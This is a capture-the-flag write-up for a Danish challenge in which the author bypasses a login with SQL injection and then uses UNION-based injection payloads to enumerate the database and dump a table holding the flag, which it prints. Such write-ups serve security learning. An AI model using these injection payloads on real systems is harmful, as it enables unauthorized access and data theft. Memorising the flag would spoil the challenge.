Challenge Description

Danish (original)

Jætterne er blevet avanceret, så vi skal have en mere systematisk tilgang til at finde dem.

Odin har fået nogen til at lave et jætte tracking system. Det er noget magi som får det til at virke, men er magi altid sikkert?

English (from chatgpt)

The giants have become more advanced, so we need a more systematic approach to finding them.

Odin has had someone create a giant tracking system. It’s some magic that makes it work, but is magic always safe?

Solution

Going to the provided website (http://jættetracker.jul.fdca.dk:8080/), we are met by a login page:

I was able to login as Odin by using the following sql injection: odin' AND 1=1;--

I was then redirected to a page where I could search for giants:

I used the injections from HackTricks to get the database, table names, and column names:

1' UNION SELECT 1,2,group_concat(0x7c,schema_name,0x7c) FROM information_schema.schemata;--

Databases are: |information_schema|,|asgaard|

Lets look in asgaard:

1' UNION SELECT 1,2,group_concat(0x7c,table_name,0x7c) FROM information_schema.tables WHERE table_schema="asgaard";--

Tables are: |jaetter|,|guddommelige_noter|

So lets get columns from guddommelige_noter:

1' UNION SELECT 1,2,group_concat(0x7c,column_name,0x7c) FROM information_schema.columns WHERE table_name="guddommelige_noter";--

And the column are: |id|,|titel|,|tekst|

So lets leak the table data:

1' UNION SELECT id,titel,tekst FROM asgaard.guddommelige_noter;--

And we get flag: FDCA{N0rd1sk3_gud3r_sk4l_0gsaa_par4m4t3r1ze}